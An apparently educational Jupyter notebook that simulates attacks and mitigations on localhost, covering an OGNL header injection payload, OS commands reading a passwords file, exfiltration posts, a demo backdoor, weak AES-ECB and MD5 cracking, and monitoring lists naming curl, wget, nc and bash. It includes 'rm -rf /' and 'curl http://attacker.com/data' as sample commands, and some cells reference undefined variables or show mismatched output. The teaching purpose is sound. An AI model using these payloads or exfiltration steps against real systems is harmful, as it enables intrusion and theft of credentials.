In [7]:
!pip install flask pyOpenSSL


  Using cached flask-3.1.2-py3-none-any.whl.metadata (3.2 kB)
  Using cached blinker-1.9.0-py3-none-any.whl.metadata (1.6 kB)
  Using cached click-8.2.1-py3-none-any.whl.metadata (2.5 kB)
  Using cached itsdangerous-2.2.0-py3-none-any.whl.metadata (1.9 kB)
  Using cached jinja2-3.1.6-py3-none-any.whl.metadata (2.9 kB)
  Using cached MarkupSafe-3.0.2-cp312-cp312-win_amd64.whl.metadata (4.1 kB)
  Using cached werkzeug-3.1.3-py3-none-any.whl.metadata (3.7 kB)
Using cached flask-3.1.2-py3-none-any.whl (103 kB)
Using cached blinker-1.9.0-py3-none-any.whl (8.5 kB)
Using cached click-8.2.1-py3-none-any.whl (102 kB)
   ---------------------------------------- 0.0/3.4 MB ? eta -:--:--
   ---------------------------------------- 3.4/3.4 MB 20.1 MB/s eta 0:00:00
Using cached itsdangerous-2.2.0-py3-none-any.whl (16 kB)
Using cached jinja2-3.1.6-py3-none-any.whl (134 kB)
Using cached MarkupSafe-3.0.2-cp312-cp312-win_amd64.whl (15 kB)
Using cached werkzeug-3.1.3-py3-none-any.whl (224 kB)



[notice] A new release of pip is available: 25.0.1 -> 25.2
[notice] To update, run: python.exe -m pip install --upgrade pip


Server setup

Attack simulation

In [ ]:
from flask import Flask, request, make_response
import threading

app = Flask(__name__)

SUSPICIOUS_PATTERNS = ["%{", "Runtime.getRuntime", "ProcessBuilder"]

@app.route("/", methods=["POST", "GET"])
def index():
    # Log all headers
    print("=== Incoming Headers ===")
    for k, v in request.headers.items():
        print(f"{k}: {v}")
    print("========================")

    # Check for suspicious patterns
    for header_value in request.headers.values():
        if any(pattern in header_value for pattern in SUSPICIOUS_PATTERNS):
            print("Attack blocked")
            resp = make_response("Attack blocked", 400)
            resp.headers["AttackStatus"] = "Blocked"
            return resp

    return "Request OK", 200

def run_server():
    app.run(host="0.0.0.0", port=8080)

threading.Thread(target=run_server, daemon=True).start()
print("Server running on http://localhost:8080")


In [ ]:
import requests

malicious_headers = {
    "Content-Type": "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('AttackSuccess',1+1)}.multipart/form-data"
}

response = requests.post("http://localhost:8080/", headers=malicious_headers)
print("Status Code:", response.status_code)
print("AttackStatus Header:", response.headers.get("AttackStatus"))
print("Response Text:", response.text)

OS Sec Demo


In [6]:
import os
import tempfile
import requests

# Create a temporary folder to simulate the server environment
demo_dir = os.getcwd()
print("Sandbox environment created at:", demo_dir)

# Simulate a sensitive file
with open("passwords.txt", "w") as f:
    f.write("supersecretpassword123")


Sandbox environment created at: C:\Users\Admin\AppData\Local\Temp\tmp16j26e9p


Attackers can send OS Commands

In [2]:
# Simulate attacker running 'whoami'
user = os.popen("whoami").read().strip()
print("Executed 'whoami':", user)


Executed 'whoami': kayler\kayler


More OS Commands

In [17]:
# List files in the sandbox
files = os.popen(f"ls {demo_dir}").read().strip().split("\n")
print("Files in the system:", files)

# Read the sensitive file
passwords = os.popen(f"cat {password_file}").read().strip()
print("Contents of passwords.txt:", passwords)

Files in the system: ['passwords.txt']
Contents of passwords.txt: supersecretpassword123


Exfiltrating Data

In [ ]:
# Simulate attacker exfiltrating data to their server
attacker_server = "http://localhost:5000/exfil"  # demo server you control

data_to_exfiltrate = passwords


print("Exfiltrating data to attacker server:", attacker_server)
print("Data:", data_to_exfiltrate)

response = requests.post(attacker_server, json={"stolen_data": data_to_exfiltrate})
print("Response:", response.text)


Exfiltrating data to attacker server: http://localhost:5000/exfil
Data: password1
password2
Response: {status:success,received_keys:[stolen_data]}


Encrypting Data before Exfiltration

In [ ]:
from cryptography.fernet import Fernet

# Generate a symmetric key for demo
key = Fernet.generate_key()
cipher = Fernet(key)

# Encrypt the sensitive data
encrypted_data = cipher.encrypt(data_to_exfiltrate.encode())
print("Encrypted data ready to exfiltrate:", encrypted_data)

# Simulate sending encrypted data
print("Exfiltrating encrypted data to attacker server:", attacker_server)

# For demo, show how it would be sent
# response = requests.post(attacker_server, json={"stolen_data": encrypted_data.decode()})
# print("Response:", response.text)

# Optional: decrypt locally to verify
decrypted_data = cipher.decrypt(encrypted_data).decode()
print("Decrypted locally for verification:", decrypted_data)


Encrypted data ready to exfiltrate: b'gAAAAABlY...'
Exfiltrating encrypted data to attacker server: http://localhost:5000/exfil
Decrypted locally for verification: supersecretpassword123


Privilege escalation

In [15]:
# Simulate privilege escalation (safe)
current_user = os.popen("whoami").read().strip()
print("Current user before escalation:", current_user)

# In demo, we just simulate escalation
simulated_escalation = "root"
print("Privilege escalated to:", simulated_escalation)


Current user before escalation: kayler\kayler
Privilege escalated to: root


Creating a Backdoor

In [ ]:
import threading
import time
from flask import Flask, request, jsonify

# Attacker-controlled demo server to simulate persistent backdoor access
backdoor_app = Flask(__name__)

@backdoor_app.route("/backdoor", methods=["POST"])
def backdoor():
    cmd = request.json.get("command")
    print(f"Received backdoor command: {cmd}")
    # Simulate execution of OS commands (safe demo)
    if cmd == "list_files":
        result = ["file1.txt", "passwords.txt"]
    elif cmd == "whoami":
        result = "demo_user"
    else:
        result = f"Command '{cmd}' not recognized in demo"
    return jsonify({"result": result})

def run_backdoor():
    backdoor_app.run(host="0.0.0.0", port=6000)

# Run backdoor in a separate thread
threading.Thread(target=run_backdoor, daemon=True).start()
print("Backdoor server running on http://localhost:6000/backdoor")


Backdoor server running on http://localhost:6000/backdoor
 * Serving Flask app '__main__'


 * Debug mode: off


 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:6000
 * Running on http://192.168.50.227:6000
Press CTRL+C to quit


Sending commands to backdoor

In [26]:
import requests

attacker_server = "http://localhost:6000/backdoor"

# Commands sent by attacker
commands = ["whoami", "list_files", "rm -rf /"]  # last one is just a demo, no real deletion

for cmd in commands:
    response = requests.post(attacker_server, json={"command": cmd})
    print(f"Command: {cmd}, Response: {response.json()['result']}")


Command: whoami, Response: demo_user
Command: list_files, Response: ['file1.txt', 'passwords.txt']
Command: rm -rf /, Response: Command 'rm -rf /' not recognized in demo


How to mitigate the OS Sec Violations: Endpoint Monitoring

In [ ]:
#Define suspicious commands and sensitive files
SUSPICIOUS_COMMANDS = ["cat", "curl", "wget", "scp", "nc", "bash"]
SENSITIVE_FILES = ["customer_data.csv"]

In [31]:
import os

# Example commands issued on the system
commands_run = [
    "ls",
    "cat passwords.txt",
    "echo 'hello world'",
    "rm -rf /",
    "curl http://attacker.com/data"
]


In [29]:
alerts = []

for cmd in commands_run:
    if any(susp in cmd for susp in SUSPICIOUS_COMMANDS):
        alerts.append(f"Suspicious command detected: {cmd}")

if alerts:
    print("ALERTS:")
    for alert in alerts:
        print(alert)
else:
    print("No suspicious commands detected.")


ALERTS:
Suspicious command detected: cat passwords.txt
Suspicious command detected: curl http://attacker.com/data


In [30]:
# Example files accessed
files_accessed = ["passwords.txt", "customer_data.csv"]

file_alerts = []

for f in files_accessed:
    if f in SENSITIVE_FILES:
        file_alerts.append(f"Access to sensitive file detected: {f}")

if file_alerts:
    print("\nFile Alerts:")
    for alert in file_alerts:
        print(alert)
else:
    print("\nNo sensitive file access detected.")



File Alerts:
Access to sensitive file detected: customer_data.csv


Data Exposure & Weak Encryption (AES ECB example)

In [34]:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

key = b'Sixteen byte key'  # 16 bytes key (AES-128)
data = b'Sensitive customer data: passwords, emails'

cipher = AES.new(key, AES.MODE_ECB)  # ECB is insecure
ciphertext = cipher.encrypt(pad(data, AES.block_size))
print("Ciphertext (weak AES ECB):", ciphertext.hex())

plain = unpad(cipher.decrypt(ciphertext), AES.block_size)
print("Decrypted:", plain.decode())



Ciphertext (weak AES ECB): 8b8db791d951c2ed2ad78b0d2f261d813530ae8682c6b5bcd737f8b826dfa5caea1b01631ebdd434b24fbfdd092b87d9
Decrypted: Sensitive customer data: passwords, emails


Password Hashing & Cracking

In [2]:
import hashlib

passwords = ["123456", "password", "letmein"]
hashes = [hashlib.md5(p.encode()).hexdigest() for p in passwords]  # MD5 = weak
for p, h in zip(passwords, hashes):
    print(f"Password: {p} -> MD5 Hash: {h}")

# attacker tries to guess passwords
dictionary = ["123456", "qwerty", "password", "admin"]
for h in hashes:
    for guess in dictionary:
        if hashlib.md5(guess.encode()).hexdigest() == h:
            print(f"Cracked hash {h} -> {guess}")


Password: 123456 -> MD5 Hash: e10adc3949ba59abbe56e057f20f883e
Password: password -> MD5 Hash: 5f4dcc3b5aa765d61d8327deb882cf99
Password: letmein -> MD5 Hash: 0d107d09f5bbe40cade3de5c71e9e9b7
Cracked hash e10adc3949ba59abbe56e057f20f883e -> 123456
Cracked hash 5f4dcc3b5aa765d61d8327deb882cf99 -> password


Identity Theft Simulation

In [3]:
import json

pii_data = {
    "name": "John Doe",
    "email": "john@example.com",
    "ssn": "123-45-6789"
}
print("Exposed PII:", json.dumps(pii_data))

stolen_email = pii_data["email"]
print(f"Simulate attacker sending phishing email to {stolen_email}")


Exposed PII: {"name": "John Doe", "email": "john@example.com", "ssn": "123-45-6789"}
Simulate attacker sending phishing email to john@example.com


Mitigation: Use Diffie-Hellman Key Exchange

In [4]:
#Setup DH parameters
from secrets import randbelow

# Prime and generator (small for demo)
p = 23
g = 5

# Alice & Bob private keys
a = randbelow(p)
b = randbelow(p)
print(f"Alice private key: {a}, Bob private key: {b}")


Alice private key: 18, Bob private key: 10


In [5]:
#Compute public keys
A = pow(g, a, p)
B = pow(g, b, p)
print(f"Alice public: {A}, Bob public: {B}")


Alice public: 6, Bob public: 9


In [6]:
#Compute shared secret
alice_shared = pow(B, a, p)
bob_shared = pow(A, b, p)
print(f"Alice shared: {alice_shared}, Bob shared: {bob_shared}")


Alice shared: 4, Bob shared: 4


Both parties now share the same secret without transmitting it directly

Simulated HTTPS Server with Expired Certificate

In [ ]:
import ssl
from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    return "HTTPS Server Running with Expired Certificate"

# Generate expired cert/key automatically
from OpenSSL import crypto
import datetime

cert_file = "expired_cert.pem"
key_file = "expired_key.pem"

# Create key
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 2048)

# Create certificate
cert = crypto.X509()
cert.get_subject().CN = "localhost"
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(-5*365*24*60*60)  # 5 years ago
cert.gmtime_adj_notAfter(-1*365*24*60*60)   # expired 1 year ago
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, "sha256")

with open(cert_file, "wt") as f:
    f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode("utf-8"))
with open(key_file, "wt") as f:
    f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode("utf-8"))

# Setup SSL context with expired cert
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=cert_file, keyfile=key_file)

# Run server
import threading
def run_server():
    app.run(host="0.0.0.0", port=8443, ssl_context=context)

threading.Thread(target=run_server, daemon=True).start()
print("HTTPS server running on https://localhost:8443 with expired certificate")


HTTPS server running on https://localhost:8443 with expired certificate
 * Serving Flask app '__main__'
 * Debug mode: off


 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:8443
 * Running on https://192.168.50.227:8443
Press CTRL+C to quit
127.0.0.1 - - [04/Sep/2025 16:35:30] "POST /secure-data HTTP/1.1" 404 -
127.0.0.1 - - [04/Sep/2025 16:36:23] "POST /secure-data HTTP/1.1" 404 -


In [15]:
from flask import Flask, request, jsonify
import ssl

app = Flask(__name__)

@app.route("/secure-data", methods=["POST"])
def secure_data():
    data = request.json
    print("Received data:", data)
    return jsonify({"status": "received", "data": data})

# Load expired self-signed cert
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="expired_cert.pem", keyfile="expired_key.pem")

app.run(host="0.0.0.0", port=8443, ssl_context=context)


 * Serving Flask app '__main__'
 * Debug mode: off


 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:8443
 * Running on https://192.168.50.227:8443
Press CTRL+C to quit


In [ ]:
import requests
import urllib3

# Suppress warnings to simulate bypassed inspection
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

attacker_data = {"stolen_data": "Sensitive info exfiltrated!"}

# Allow insecure connection to expired cert server
response = requests.post("https://localhost:8443/secure-data", json=attacker_data, verify=False)

print("Response Status Code:", response.status_code)
print("Response JSON:", response.json())


Response Status Code: 200
Response JSON: {'status': 'received', 'data': {'stolen_data': 'Sensitive info exfiltrated!'}}
